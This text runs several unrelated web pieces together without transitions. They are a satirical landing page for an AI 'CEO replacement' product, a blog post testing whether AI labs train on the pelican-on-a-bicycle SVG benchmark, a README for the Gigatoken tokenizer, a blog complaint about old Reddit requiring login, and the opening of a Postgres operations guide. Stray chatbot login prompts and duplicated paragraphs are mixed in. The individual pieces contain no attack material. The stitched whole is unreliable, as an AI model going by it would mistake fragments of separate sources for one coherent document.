Get responses tailored to you
Log in to get answers based on saved chats, plus create images and upload files.
10 interesting stories served every morning and every evening.
Get responses tailored to you
Log in to get answers based on saved chats, plus create images and upload files.
Introducing the world’s first Chief Executive Replacement Engine
Your CEO costs $22,000,000 a year.We cost $4,699. Once.
OverpAId is an Artificial Intelligence built from the ground up to do your CEO’s entire job — strategy, “vision,” motivational all-hands emails — better, faster, and without ever once asking the board for a bigger jet. Runs on a single desk-sized AI computer. Real hardware, real price, zero mystique.
No golden parachute required. No severance package. No emotional support LinkedIn post.
$18.9M
Average S&P 500 CEO total compensation, in a good year for everyone except the workforce
290 : 1
Typical CEO-to-median-worker pay ratio at large public companies
24/7/365
OverpAId’s uptime. Your CEO’s uptime: somewhere between “at Davos” and “processing.”
0
Corporate retreats OverpAId needs in Aspen to “reconnect with the mission”
As Featured In (Not Really)
FORBES (Nobody Reads It) THE WALL STREET JOURNAL (Wouldn’t Say Jack) TECHCRUNCH (Crunched By Layoffs) BLOOMBERG (Allegedly) FAST COMPANY (Slow, Actually)
Live Activity
What’s Happening Right Now
A completely real-time, definitely-not-randomized feed of executive activity vs. OverpAId activity.
The Problem
Let’s talk about the elephant in the boardroom.
Over the last four decades, CEO pay at the largest companies has grown roughly 1,000%+, while typical worker pay has crawled forward at a fraction of that rate — despite worker productivity climbing the entire time. Somewhere along the way, the story became: pay the person at the top enough, and the value will trickle down to everyone else. It hasn’t. It doesn’t. It never really did.
Meanwhile, the actual day-to-day decisions driving most companies — resource allocation, pattern recognition across mountains of data, “should we do the thing the data clearly says to do” — are exactly the kind of decisions software has gotten extremely good at. So we built the obvious, extremely petty, deeply satisfying next step.
Meanwhile, Back At The Earnings Call
The Layoff Two-Step.
Across tech, retail, media, logistics, and finance, a very specific script has taken over: cut a wave of frontline and mid-level jobs, say “AI” as many times as possible in the press release, and quietly reroute the freed-up payroll into GPU leases, data center buildouts, and “agentic AI” licensing fees. The workforce gets “optimized” to pay for the AI. The AI then gets credit for replacing the workforce. And the executive team that approved both line items — the layoffs and the AI budget — stays exactly where it was, at exactly its previous salary. In tech alone, well over half a million jobs have been cut across successive waves of these announcements, a growing share of them explicitly attributed to “AI-driven efficiency,” while aggregate CEO pay at the same companies kept climbing right alongside the AI capital expenditure.
Humbled and honored to step into this role at such a pivotal moment for our company. I’ve spent the last two weeks listening — to customers, to our board, to myself — and I can say with total conviction: our people are our greatest asset. (This post was scheduled before this morning’s announcement. We are aware. We are moving forward.)
💜 2,847 💬 412 (mostly Glassdoor reviews) 🔁 89
Executive Leadership 0% reduction
Senior Directors -8%
Middle Management -22%
Frontline & Support Staff -34%
The only layer immune to “efficiency” is the one that approves it.
Here’s the part that should bother you more than the layoffs themselves: these companies already believe an AI agent can do a person’s job well enough to eliminate the position entirely. They just keep drawing that line one layer too low. If an agent can run a support queue, manage a supply chain, or ship half a codebase, it can obviously handle “approve the reorg” and “read the analyst note out loud on the earnings call.” Somehow that layer never makes the slide. That’s not a coincidence. That’s the design.
OverpAId flips the script on the one line item that’s always exempt from the AI transformation everyone else just got handed. Finally: a workforce reduction, funded by an AI initiative, that actually starts at the top.
Meanwhile, Back At The Real Estate Portfolio
The Return-To-Office Two-Step
A remarkably consistent pattern: companies spend years proving remote teams ship fine, then mandate a return to office citing “culture” and “collaboration” — on a timeline that tracks suspiciously well with lease renewals, downtown vacancy headlines, and commercial property valuations, and not at all with any actual drop in output. Office vacancy in major U.S. downtowns has hovered near 19 – 20% for years, mandates included. The desks aren’t empty because people won’t come back. They were never going to be full enough to matter.
The Offsite That Prompted All This (Itemized)
Private jet charter, round trip: $340,000
3-night resort block, executive suites: $128,000
“Team alignment” mixology class: $6,200
Keynote speaker (was on a podcast once): $75,000
Branded fleece vests, size: only Medium: $14,000
The tell is always the same: no company has ever mandated a return to office because remote productivity got worse. They mandated it because an asset on the books needed a pulse in the lobby to justify its valuation — and moving four thousand employees turned out to be easier than admitting a fifteen-year lease was a mistake.
OverpAId has no commute, no badge, and no assigned desk — and, not coincidentally, no opinion whatsoever about anyone’s downtown parking garage revenue.
For Your Next All-Hands
Corporate Jargon Bingo
Print this out. Bring it to your next town hall, standup, or “quick sync.” OverpAId has never once generated any of the following phrases unprompted. Humans — usually the ones with the biggest packages — still do, constantly, apparently for free.
Circle Back
Move The Needle
Low-Hanging Fruit
Boil The Ocean
Bandwidth
Take This Offline
Double-Click On That
North Star
Paradigm Shift
Growth Hacking
Best-In-Class
Value-Add
Synergy (Free Space)
Deep Dive
Culture Fit
Think Outside The Box
Actionable Insights
Alignment
Bleeding Edge
Disruptive Innovation
Level Set
Ideate
Operationalize
Stakeholder Buy-In
Blue Ocean Strategy
Hard Stop
10x
Unicorn
TAM
Product-Market Fit
Down Round
Runway
Blitzscale
Vesting Cliff
Overheard, verbatim, in an actual meeting: “Let’s circle back offline if you have the spare cycles so we can hop on a quick call for a touchpoint.” Translation: email me later. Six buzzwords. One sentence. Zero information transferred. OverpAId would have just said that.
Five in a row and, legally, you’re allowed to leave the meeting. (We checked. You’re not. But you should be.)
An Important Distinction
Not every job is a spreadsheet in a trench coat.
Before you print this out and staple it to your nurse’s badge — no. OverpAId is not coming for the people who do the actual work. It is coming, with extreme prejudice, for exactly one category of job: the one that spent the last forty years insisting everyone else’s job was replaceable.
🛡️ Cannot Be Abstracted Away
Ask an AI to do these and it will, at best, produce a very confident hallucination.
🩺 A nurse catching a patient’s condition change before the chart does
🏗️ An engineer debugging a live outage at 3 a.m., because the fix can’t wait for sprint planning
🚑 A doctor making a call in the ER with incomplete information and a body on the table
👩🏫 A teacher noticing which kid in the back row stopped raising their hand
🔧 A technician whose hands actually touch the machine that actually breaks
🚒 Anyone whose job involves a body, a patient, a customer, or a deadline measured in minutes
🎯 Extremely, Suspiciously Abstractable
Ask an AI to do these and, uncomfortably, it already can. Better.
📈 Reading a report someone else wrote, then repeating the conclusion in a town hall
✅ Approving a decision your own data team quietly made three weeks ago
🎤 Taking credit for quarterly numbers on an earnings call
📧 Replying “let’s circle back” to an email that needed a yes or no
For the past few years, Simon Willison has tested every major LLM release with the same prompt: “Generate an SVG of a pelican riding a bicycle”.
What began as a tongue-in-cheek benchmark has become one of the most famous informal benchmarks in AI. Simon’s pelican-on-a-bicycle results are often among the most upvoted comments on Hacker News threads announcing new releases from AI labs.
The benchmark is now famous enough that there’s plenty of discussion about its usefulness and about whether AI labs might be benchmaxxing1 on it. When billions or even trillions of dollars are at stake, and a strong result could help persuade users, wouldn’t it be tempting to pelicanmaxx your model just a bit?
I wanted to find out, so I put together a small experiment. I generated 1,008 SVGs across seven frontier models, scored them with an LLM judge, and used Claude Fable 5 for the analysis.
This article presents the results. All the code is available on Github.
How I tested it
I built a grid of 8 animals × 6 vehicles = 48 prompts, where the famous prompt is one cell:
Animals: pelican, flamingo, heron, otter, raccoon, antelope, whale, cat
Vehicles: bicycle, unicycle, skateboard, scooter, plane, boat
Every prompt uses almost identical phrasing to Simon’s, only switching the animal and vehicle. The animal and vehicle selection wasn’t done in a very rigorous manner, but I tried to vary both similarity to the original prompt and difficulty. Flamingo and heron are quite similar to pelicans; cat, raccoon, and otter are easy cases; antelope is hard; and whale is as different as you can get.
I tested seven models through OpenRouter: GPT-5.6 Terra, Claude Sonnet 5, Gemini 3.5 Flash, Grok 4.5, Qwen3.7-Max, GLM-5.2, and DeepSeek V4 Pro. I generated 3 samples per prompt, at temperature 1.0, requesting the same reasoning effort from every model. That resulted in 1,008 SVGs.
Then I ran each image through a three-stage pipeline:
Rendering: Each SVG is rendered to PNG. If a model returns no SVG or one that fails to render, I regenerate until it produces a valid one, and record the number of attempts. There were only 11 retries across the 1,008 generations.
Judging: GPT-5.6 Luna scores each image with 1 – 5 ratings for the animal, the vehicle, and the coherence of the action. When I rank animals or vehicles below, I use the matching rating on its own. When I need one number per image, I use the average of the three, which I call the judge score.
Feature extraction: For a more detailed analysis, I also passed each rendered image to Gemini 3.1 Flash-Lite, which recorded the animal and vehicle it recognized, which way the subject faces, and an open-ended list of scene elements.
My hypothesis is that if a lab trained on the benchmark, it should show up in some combination of the pelican row scoring above what the animal deserves, the bicycle column scoring above what the vehicle deserves, or the specific pelican-bicycle cell beating both.
Evidence #1: The pelicans on bicycles don’t look any better
Before any scoring, the simplest test is to look at the images yourself. Pick a lab to see everything it drew, with the judge’s score under each image (click to open full size):
I looked through the images myself before running the analysis below. Nothing jumped out at me. I couldn’t find a case where the pelican-bicycle images looked noticeably better than the rest of that model’s grid. Maybe in GLM-5.2’s first sample it felt slightly better than the rest, but that batch also produced a pretty cool heron on a skateboard, so I cannot say for sure. Otherwise they look like the rest of what each model draws, and the labs that draw good pelicans on bicycles also do a good job drawing other animal-vehicle combinations.
But this test is hard to replicate, and everyone will have a different opinion. So I wanted something more quantitative, which is why I opted for the method detailed above.
Evidence #2: Labs are not better at drawing pelicans
Here’s the mean animal rating per animal, pooled across all models:
The pelican is 6th of 8, behind cat, whale, raccoon, heron, and antelope. If AI labs were training on the benchmark, you’d expect pelicans at the top. Instead they’re in the bottom half. All seven labs draw cats, whales, and raccoons better than pelicans.
Of course, a pelican may simply be harder to draw than a cat. A lab could train on pelicans and still not push them past the easy animals, so this ranking alone can’t rule that out. I’ll adjust for difficulty in Evidence #4.
Evidence #3: Labs are not better at drawing bicycles
Bicycles fare even worse. They sit second from last, in a near-tie with planes, which come in last:
If labs were training on the benchmark, you’d expect bicycles near the top of this ranking. They’re not. However, the same caveat applies here. A bicycle is harder to draw than a skateboard: it needs two matching wheels, a frame that reaches both axles, handlebars, a seat, and pedals. The judge flags a missing or disconnected one of those on 2/3 of the bicycle images. You can train on bicycle images and still not do a great job relative to simpler vehicles.
One note on the plane, though: I should’ve picked “airplane” instead of “plane” because models often read it geometrically. They drew the animal standing on a flat surface instead of flying an aircraft. The plane is the only vehicle where the feature extractor sometimes found no vehicle at all (25 of 168 images, against zero for the other five), and 20% of plane images scored a 1 or 2 on the vehicle rating, against 5% for bicycles and none at all for boats, scooters, or skateboards.
Evidence #4: Labs are not better at drawing pelicans on bicycles, even adjusting for difficulty
Put the two together and the “pelican on a bicycle” ends up near the bottom of the ranking, at #42 of 48:
But again, some combinations might be just harder to draw than others.
To account for that, I fit a fixed-effects regression on all 1,008 images: score ~ lab + animal × vehicle, plus per-lab interaction terms for pelican, bicycle, and the pelican-bicycle cell, with robust standard errors. The animal × vehicle terms absorb the inherent difficulty of all 48 combinations. The interactions measure each lab’s benchmark-specific boost relative to the average lab, with confidence intervals.
The results:
Every per-lab pelican effect (the lab’s boost on pelicans across all six vehicles) lands between -0.11 and +0.14 judge points, and none comes close to significance (smallest p = 0.25).
The per-lab bicycle effects (the lab’s boost on bicycles across all eight animals) run from Grok 4.5 at -0.18 (p=0.11) to Gemini 3.5 Flash at +0.27 (p=0.022). Only Gemini clears p < 0.05, and the seven point in both directions.
No pelican-bicycle cell effect (the extra boost on the specific combination, on top of the lab’s pelican and bicycle effects) clears p < 0.05. The largest positive is GLM-5.2 at +0.35 (p=0.12), which is the one I mentioned earlier. It’s the closest thing to a signal in this experiment, but still within chance.
Here are the full per-lab estimates. A pelicanmaxxing lab would show dots to the right of the zero line across its whole row:
Every pelican interval and every cell interval contains zero. Exactly one doesn’t: Gemini 3.5 Flash in the bicycle column. But with 21 tests at p < 0.05, chance alone predicts about one false positive (21 × 0.05 ≈ 1.05), and one is exactly what came up. It also doesn’t survive a multiple-comparisons correction: the Bonferroni threshold across the 21 tests is 0.05/21 ≈ 0.002, and its p-value is 0.022. The full table of estimates and p-values is in the repo.
But these intervals are wide, about ±0.6 judge points on average. Any boost smaller than that won’t be captured by this test.
Evidence #5: The pelican-bicycle scenes don’t look memorized
Some have suggested that the pelican on a bicycle looks like a memorized composition, pointing to recurring patterns such as the pelican always facing right, or recurring elements like a sun or a scarf. So I wanted to know if this was true.
Direction: All 21 pelican-bicycle images, across all seven labs, face right. No other animal/vehicle combination does that.
However, facing right is common: 60% of all 1,008 images do it. How common depends on the animal and the vehicle, and bicycles are one of the two vehicles where it’s strongest:
Pelicans are also among the animals that tend to face right:
It’s hard to draw a pelican or a bicycle facing the viewer, so models almost always draw them from the side, facing left or right. That’s why so few of their images are ambiguous. Other combinations also come close to unanimous: antelope on a scooter and pelican on a scooter land at 20 of 21, and heron on a bicycle at 19 of 21. So 21 out of 21 doesn’t seem like an outlier.
Scene elements: I let the extractor name any element it saw in the image. These are the counts:
A memorized scene would show up as the same set of elements recurring picture after picture. I went looking for that, and found some combinations do tend to produce the same elements every time. Every single flamingo on a boat has a sun in it. Otters on planes wear scarves 38% of the time. Cats on bicycles get a basket 38% of the time.
The pelican on a bicycle doesn’t seem to have anything particularly different about it. It just has some elements that appear more frequently, like every other animal-vehicle combination.
Limitations
Using a single LLM judge for scoring. Every score here comes from one model, GPT-5.6 Luna, looking at one image at a time. I didn’t do much alignment and didn’t check how often it agrees with itself on a re-run. If a model just can’t judge a drawing reliably, none of the numbers above mean much. The judge is also from the same family as one of the contestants, GPT-5.6 Terra. However, every lab draws all 48 combinations, so a judge that happens to like one lab’s style lifts that lab’s whole grid at once. But that doesn’t change the results because this analysis only cares about the within-lab differences.
SVGmaxxing. A lab that optimized SVG generation as a whole (or a subset such as animals on vehicles) rises on every cell at once and looks identical to a lab that’s just good. Some labs, such as Google/DeepMind, openly do this. This experiment can’t detect that.
Limited budget. The whole experiment ran on roughly $80 of API credits. That capped it at 3 samples per cell, a single judge, and 7 models. This also prevented me from iterating too much on the prompts and pipeline, as with the “plane” vs. “airplane” case.
Conclusion
Sorry, HN haters, but there’s little evidence that AI labs are pelicanmaxxing. Or at least they’re not doing it in a plainly obvious manner.
Pelicans aren’t drawn any better than other animals. Bicycles aren’t drawn any better than other vehicles. And no lab draws the combination better than its pelicans and bicycles already predict. GLM-5.2 comes closest: it has the largest boost on the exact pelican-bicycle cell, and and its first pelican-on-bicycle sample caught my eye. But the effect is small and not significant, so I wouldn’t put too much weight on it.
The other thing that stands out is direction in the scene composition. All 21 pelican-bicycle images face right, the only combination in the grid where every image agrees. But it doesn’t seem that strange. Facing right is the norm across the experiment. Three other combinations land at 90% or above, and with 48 of them, I’m not surprised one reached 21 out of 21.
The more plausible story is SVGmaxxing like Google/DeepMind does. Other labs might be doing it more quietly. Sadly, this experiment can’t say who’s doing it. But at least you can sleep tonight knowing that AI labs are not producing terabytes of pelicans on bicycles just to trick Simon Willison.
If you want to look at the data yourself, the full pipeline is in the repo.
Footnotes
the practice of optimizing AI models to achieve high scores on popular benchmarks.↩︎
the practice of optimizing AI models to achieve high scores on popular benchmarks.↩︎
Citation
BibTeX citation:
@online{castillo2026, author = {Castillo, Dylan}, title = {Are {AI} Labs Pelicanmaxxing?}, date = {2026 – 07-18}, url = {https://dylancastillo.co/posts/pelicanmaxxing.html}, langid = {en} }
For attribution, please cite this work as:
Castillo, Dylan. 2026. “Are AI Labs Pelicanmaxxing?” July 18. https://dylancastillo.co/posts/pelicanmaxxing.html.
~1000x faster than HuggingFace’s tokenizers, drop-in replacement.
Tokenize your text data at GB/s!
Note that both HF tokenizers and tiktoken are already running multithreaded Rust!
What is Gigatoken?
Gigatoken is the fastest tokenizer for language modeling. It supports a wide range of CPU hardware, and nearly all commonly used tokenizers. See the Benchmarks section for detailed throughput numbers across tokenizers and CPUs.
Installation
pip install gigatoken
Usage
Gigatoken can be used with its own API, or in compatibility mode with HuggingFace Tokenizers or Tiktoken.
Compatibility Mode (Easiest)
import gigatoken as gt
# Minimum change from existing HuggingFace tokenizers usage (compatibility mode) hf_tokenizer = … tokenizer = gt.Tokenizer(hf_tokenizer).as_hf()
# tokenizer can be used in the same contexts as hf_tokenizer tokens = tokenizer.encode_batch([“This is a test string”, “And here is another”])
# OR with tiktoken tiktokenizer = … tokenizer = gt.Tokenizer(tiktokenizer).as_tiktoken()
# Now works like existing tiktoken tokenizers tokens = tokenizer.encode_batch([“This is a test string”, “And here is another”])
A substantial amount of effort has been put into making sure the outputs match exactly with what you would get with HuggingFace Tokenizers in this setting, but this is at a non-negligible cost to performance. You can still expect way faster performance across the board, but not quite the 1000x you will get with the Gigatoken API.
Gigatoken API (Fastest)
import gigatoken as gt
tokenizer = gt.Tokenizer(“Qwen/Qwen3 – 8B”) # Accepts HF model names file_source = gt.TextFileSource([“owt_train.txt”], separator=b”<|endoftext|>“) tokens = tokenizer.encode_files(file_source)
Using the Gigatoken API lets the Rust implementation read data directly, and skips as much overhead as possible while allowing for maximum parallelism. Keep in mind that passing Python data structures through this API still incurs the overhead of reading from Python.
Benchmarks
OWT (openwebtext) was chosen because it’s roughly representative of the text you get after extraction from CommonCrawl documents. Gigatoken encodes the whole file un-split, and is thus doing more work than the other tokenizers to find the split boundaries and automatically parallelize. HuggingFace tokenizers (encode_batch_fast) gets the first 100 MB and tiktoken (encode_ordinary_batch) the first 1 GB, both presplit on <|endoftext|>. This is fair because neither of the compared tokenizers do caching, meaning the speed is roughly uniform throughout processing. Tiktoken rows are currently only filled in for tokenizers with official support.
The slowest rows are the SentencePiece-based tokenizers, which are not well optimized in Gigatoken.
Each row is one distinct tokenizer (identical vocab/merges/pretokenizer), measured on a representative repo. If you don’t see your tokenizer here, it’s likely based on some existing one. For instance:
Llama 3 / 3.1 / 3.2 — Llama 3 / 3.1 / 3.2, DeepSeek-R1-Distill-Llama, Hermes 3, Saiga, and other Llama-3 finetunes
Llama 3.3 — Llama 3.3, Llama-3.1-Nemotron-Nano-VL, SmolLM3, Kanana 1.5, jina-embeddings-v5, Ultravox
Qwen 2 / 2.5 — Qwen 2 and 2.5 (incl. Coder and VL), Qwen3-Coder, Qwen3-VL, DeepSeek-R1 Qwen distills, MiMo V2.5, MiniCPM-o 2.6, InternVL3
Qwen 3 — Qwen 3 (incl. Embedding and Reranker), Qwen2.5-Omni, Qwen3-VL-Embedding, MiMo V2.5 Pro, jina-reranker-m0, pplx-embed, MOSS-TTS, Zeta
DeepSeek V3 / R1 / V4 — DeepSeek V3 / V3.1 / V3.2, R1, V4 Flash and Pro, DeepSeek-VL2
GLM 4 — GLM 4.1V, 4.5, and 4.7
GLM 5 — GLM 5 / 5.2 and GLM-4.7-Flash
Nemotron 3 — Nemotron 3 Nano, Super, and Ultra
Kimi K2 — Kimi K2 / K2.5 / K2.6 / K2.7, Kimi-Linear, Kimi-VL, Moonlight
Phi-4-mini — Phi-4-mini and Phi-4-multimodal
TinyLlama / Phi-3 (Llama 2) — TinyLlama, Phi-3-mini, Phi-3.5-mini and Phi-3.5-vision (the Llama 2 vocab)
Gemma 3 — Gemma 3 (270M–27B) and EmbeddingGemma
Gemma 4 — Gemma 4 (dense, MoE, and E-series) and DiffusionGemma
FAQ
Q: Did you just way over-optimize for a specific CPU and tokenizer? How is it so fast?
No, I way over-optimized for every combination of these! The results are very consistent across CPUs (modern x86 and ARM), and across specific tokenizers.
The major improvements are in optimizing heavily an implementation that usually is outsourced to a Regex engine (pretokenization) using SIMD, minimizing branching and other tricks, as well as heavily optimizing caching of pretoken mappings (if a word has been seen before, look it up its encoded tokens efficiently). Caching is a very hard problem in this domain since the cache grows very quickly, and pretoken distributions are very long-tailed.
Some gains are also achieved from minimizing interactions with Python, and avoiding communication between threads.
Q: How can I quickly check if my tokenizer is supported?
You can try it out without installing anything! The following command will validate and time tokenization for a given HuggingFace model repo:
# Download your data wget https://huggingface.co/datasets/stanford-cs336/owt-sample/resolve/main/owt_train.txt.gz # Just an example! gunzip owt_train.txt.gz
uvx –with tokenizers gigatoken bench ‘openai-community/gpt2’ owt_train.txt \ –validate –doc-separator “<|endoftext|>”
cpu: Apple M4 Max, 16 cores gigatoken: 1.432 s | 11920.51 MB at 8327.05 MB/s | 2701.65 Mtok at 1887.23 Mtok/s hf: 16.250 s | 100.00 MB at 6.15 MB/s | 22.76 Mtok at 1.40 Mtok/s gigatoken is 1353.13x faster than hf validation OK: 20401 documents match
cpu: AMD EPYC 9565 72-Core Processor, 144 cores, 2 sockets gigatoken: 0.486 s | 11920.51 MB at 24532.45 MB/s | 2701.65 Mtok at 5564.94 Mtok/s hf: 4.033 s | 100.00 MB at 24.80 MB/s | 22.76 Mtok at 5.63 Mtok/s gigatoken is 989.21x faster than hf validation OK: 20401 documents match
At the rates we see on the EPYC CPU, you could tokenize the entirety of Common Crawl (often considered to be the entire internet, 130 trillion tokens) in just under 6.5 hours!
This example uses the train sample from this dataset, and the CLI by default subsets to the first 100MB of the file for validation and comparison with HF. You can see help for these flags with uvx gigatoken bench –help. You might need to run your commands twice on macOS to get a good reading, since the first run will always perform a security scan, which will slow down the Rust code.
Q: I’ve found a mismatch/slow use-case, is this expected?
Most likely not! Despite reasonably wide testing I don’t have every use-case on hand, so please report anything you find in a GitHub Issue so I can address it as soon as possible.
Citation
If you use Gigatoken in your research, please cite it as:
@software{roed2026gigatoken, author = {Marcel R{\o}d}, title = {{G}igatoken: SIMD and Cache Hierarchies for 1000x Faster Byte-Pair Encoding Tokenization on Modern CPUs}, url = {https://github.com/marcelroed/gigatoken}, year = {2026}, }
Known Issues
Python iteration is handled in Rust, but uses ABI3, which is slower than using internal version-specific CPython APIs. In the future I intend to specialize for each Python version to cut this overhead. Early experiments show a 2x speed improvement for overhead-bound cases.
File sinks are not yet implemented in the Gigatoken API.
WordPiece is not yet supported.
SentencePiece-based tokenization is not nearly as optimized as the more common BPE tokenizers. This is low priority for now since mostly Google models/BERT style models use SentencePiece.
Windows has not been tested much, so for now prefer using WSL.
Implementing the user-facing API
Widening of compatibility, for instance generalizing and porting the pretokenizer implementations to support more tokenizers, less interesting features like padding/truncation/unicode normalization
Porting SIMD strategies between AVX512/AVX2/NEON
Final profiling stages and the last ~4x worth of performance from eliminating branching and improving the pretoken cache hierarchy
Refactoring and code reuse
Reddit-The-Company
If you don’t know Reddit, it basically is the host of many popular forums. And like any company which encourages you to “come for the cats [and] stay for the empathy,” Reddit seems to be in the business of extracting as much value as it can from said forums without completely destroying them.
After all, simply fostering community is not a noble enough goal for the New Tech, and fortunately for Reddit, genuinely human-generated data is now gold in the LLM Age. You are welcome to read about the last time they decided to pluck the metaphorical liver from their communities.
Reddit-The-Search-Results
While I no longer wish to engage with Reddit, I still visit it occasionally, especially in the LLM Age. This is because appending site: reddit.com to a search query is basically a surefire way to find results written by genuine humans. Which, just to be extremely clear, I still find desirable.
Now behind a login… sort of
After doing such a query yesterday, to my absolute delight I was greeted with
I guess this makes me old, but I use the original frontend for Reddit, old.reddit.com. I’m going to try really hard not to preach about why it’s a better frontend, but that’s all it is! A design for Reddit.
Look, I know I’m a fringe user. I use Firefox. I noscript! I am no stranger to being forced off a product that worked just fine because someone decides to no longer support the two people who still use it.
It happened to my phone of 8 years, which works fine by the way, but is on too outdated of an OS. May it rest in peace in its tiny glory.
It happened to my phone of 8 years, which works fine by the way, but is on too outdated of an OS. May it rest in peace in its tiny glory.
It happened to my tablet of 10 years, which works even better than my phone and holds a charge like champ, for the same reason.
It happened to my tablet of 10 years, which works even better than my phone and holds a charge like champ, for the same reason.
It happened to the API for Stack Exchange used by my copy of their outdated app long removed from the app store. This one hurt me the most.1
It happened to the API for Stack Exchange used by my copy of their outdated app long removed from the app store. This one hurt me the most.1
Where I feel like things get personal here is that Reddit is saying that this is all
To keep Reddit safe
To keep Reddit safe
Keep Reddit safe from whom exactly? Me? My desire for knowledge??
Safety is what exactly?
So let’s see what they have to say on this matter by going to the announcement, which of course I didn’t see because I don’t read Reddit anymore: https://old.reddit.com/r/modnews/comments/1ujtebf/logging_in_to_use_old_reddit/. Hope you’re logged in.
Old Reddit’s logged-out experience is a significant source of abusive scraping and automated traffic on the platform.
Old Reddit’s logged-out experience is a significant source of abusive scraping and automated traffic on the platform.
Hmmm, OK. But then why is New Reddit still accessible logged out? Oh, someone asked that.
[Question]: What’s so different about new reddit that people don’t try to scrape that? Seems to me like it would be better to just implement that on old reddit too. Besides, won’t this just cause people to try and scrape new reddit? [Admin reply]: I was about to type an answer but just saw u/Nestramutat- gave a really eloquent answer in another comment! [The comment (snipped)]: … To your first question, the shape of malicious traffic is always changing. It’s going to be a constant cat and mouse game as you ban one method, a new one gets developed. It’s easy to see abusive traffic in hindsight, but it’s harder to pre-emptively block it. Given that they’re claiming Old Reddit doesn’t have the modern security stack, this is likely proving to be an even greater challenge…
[Question]: What’s so different about new reddit that people don’t try to scrape that? Seems to me like it would be better to just implement that on old reddit too. Besides, won’t this just cause people to try and scrape new reddit?
[Admin reply]: I was about to type an answer but just saw u/Nestramutat- gave a really eloquent answer in another comment!
[The comment (snipped)]: … To your first question, the shape of malicious traffic is always changing. It’s going to be a constant cat and mouse game as you ban one method, a new one gets developed. It’s easy to see abusive traffic in hindsight, but it’s harder to pre-emptively block it. Given that they’re claiming Old Reddit doesn’t have the modern security stack, this is likely proving to be an even greater challenge…
So it doesn’t have “the modern security stack.” Now I may not have really earned my Full Stack stripes, but I can right click and select Inspect Element so I’d say I’m qualified enough to see why.
Old versus New
Old Reddit
Let’s start by — begrudgingly — logging in to see what is so insecure about old.reddit.com. I’ll use their announcement thread to test. Ahhh, so much nicer.
Let’s check what Old Reddit is doing that makes it so insecure. The best I can guess is that their precious, precious user-created content is available in plain HTML, since that’s basically all Old Reddit does: you don’t even need JS unless you want to load more comments (ask me how I know).
It DLs about 1 megabyte and sends about half a megabyte. It’s not shown there, but the page’s HTML itself comprises most of the response. I’ve certainly seen worse, but what’s with the load time? GitHub loads its massive payload about 4x as fast (relative to size).
Oh… 2 whole seconds of waiting for a reply. Smells of rate-limiting. Or was Reddit always this slow?
Let’s load some more comments. (Reddit never loads all of the comments initially)
Well that was nice and lean, and pretty snappy. I don’t see my secrets being sniffed. All I got here is that Old Reddit is a pretty normal webpage, which I guess makes it insecure in comparison to…
New Reddit
Let’s see why New Reddit is so much better. In case you have unrealistic expectations, let me right them: New Reddit will not load anything more than the post itself without Javascript (JS). That’s probably what makes it more secure.
There’s a lot loading here (about 5x Old Reddit), and this is why my analysis gets rather unscientific. Rather than try to get around the “security things” (whatever that means), I instead tried to do the bare minimum necessary to fetch the content. In browser — I did not feel like writing a scraper.
This led to me basically blocking all requests to domains (including reddit.com) except for
www.redditstatic.com/js/concat
www.reddit.com/svc/shreddit/more-comments/
www.reddit.com/svc/shreddit/comment/
When you do this, the page loads a lot less, but it does load. When you click to load more comments, it spins forever, but I inspected the request fired off and it did get a response with comment text. So as far as I can gather, simply running the JS on the page is sufficient to get enough information to get comments. So I guess that’s what’s stopping the scrapers? Executing Javascript?
Just for the heck of it, let’s load some more comments without the request filter.
Well, that’s certainly less lean than Old Reddit.
In my (again, unscientific) experimenting, I reloaded the page several times and tried to load comments and replies and didn’t get any failures. One time, when I had the request filter off, I got redirected and saw a captcha field sent as a query param, but I couldn’t reproduce that. I don’t know whether you get a captcha if you just gun it directly for the comments.
But I did notice this helpful heartbeat sent back to Reddit every time I scrolled or moved my cursor.
I guess that makes me feel safer?
So what’s safer?
Let’s dispel any notion that there are safety issues arising from a frontend, because that’s pure PR crap. Instead, if we read between the lines, Reddit doesn’t want people scraping (because it’s their gold, dammit!) and they think that shafting a few Old Reddit users will disrupt the scraping enough.
Does this actually stop scraping? I don’t know!
I won’t claim to have proven you can still scrape New Reddit: surely it must be harder, but it seems to just be that scrapers — surprise, surprise — prefer using a leaner form of Reddit. Which, by the way, loads 8x more comments by default (200 vs 25; yes, New Reddit really only loads 25 comments initially, going up to like 35 automatically if you scroll some).
Cynically, it seems like Reddit discovered they can make scraping harder by making your browser load more and work more, which they had already done by rewriting a nice piece of HTML into a 5x more bloated mess of web components or whatever. (I gave up trying not to editorialize, sorry)
The thing is that I wouldn’t have beef with Reddit if they had just quietly issued a 40X/30X error forold.reddit.com. Or if they had said “no one uses this, we’re removing it.” This is upsetting but predictable. Claiming that they need to rug-pull me because of vague assertions about security or scraping that are really not my problem? That makes me mad. I enable JS for Anubis, dammit!
Anyway
I’ll have to ponder whom this blog endangers, seeing as its core functionality — like Old Reddit’s — is serving text in plain HTML. Although maybe it’s fine for me because my blog is my content, and as such is less valuable because it was already mine to begin with. Unlike the stolen hoard of user-created content which Reddit is trying to keep secure from Big Scraping. Finders keepers!
But why not…
Log in?
Sure. I might do that. Just let me be angry that I have to, please?
Use “New” Reddit?
I might have to anyway, who knows if they’ll keep supporting Old Reddit. But mark my words, they will close the gates on logged-out New Reddit users if they think they can get away with it.
Use an LL…
Am I not allowed to bemoan the loss of the internet that once was and could still have been? Why must I consult the world’s smartest and most expensive computer just to read what people have to say about my random question? Is it so strange to want to read text written by humans?
I’ve posted this to Lobste.rs and will look at comments there.
Or reach me directly. You’re a smart cookie, I’m sure you can figure out how.
Stack Exchange’s hot new queue was the perfect replacement for Reddit on mobile when I curtailed my usage of it a long time ago. It turns out that what I liked in Reddit was reading interesting things and there was no shortage of interesting things on Stack Exchange (although they also have gone through several de-liverings which is too much of a digression even for a footnote). I now browse Wikipedia. Please don’t screw me over Wikipedia, I donated five bucks to one of your nags once. ↩︎
Stack Exchange’s hot new queue was the perfect replacement for Reddit on mobile when I curtailed my usage of it a long time ago. It turns out that what I liked in Reddit was reading interesting things and there was no shortage of interesting things on Stack Exchange (although they also have gone through several de-liverings which is too much of a digression even for a footnote). I now browse Wikipedia. Please don’t screw me over Wikipedia, I donated five bucks to one of your nags once. ↩︎
Over the past half year or so, I’ve been writing an internal doc for our engineers trying to distill two years of Postgres battles into a somewhat cohesive document. While I love the Postgres manual, I find it’s hard to turn to when shit hits the fan because it’s just so darn comprehensive. I thought this might be useful for others and would appreciate feedback (or other tidbits that you’ve learned running Postgres in production).
Before starting Hatchet, while I was familiar with SQL, the extent of my knowledge was basically: if a query is slow, you need an index. That’s the starting point for this doc; I’m going to assume you’re familiar with SQL basics, rows, tables, and know roughly what an index is.
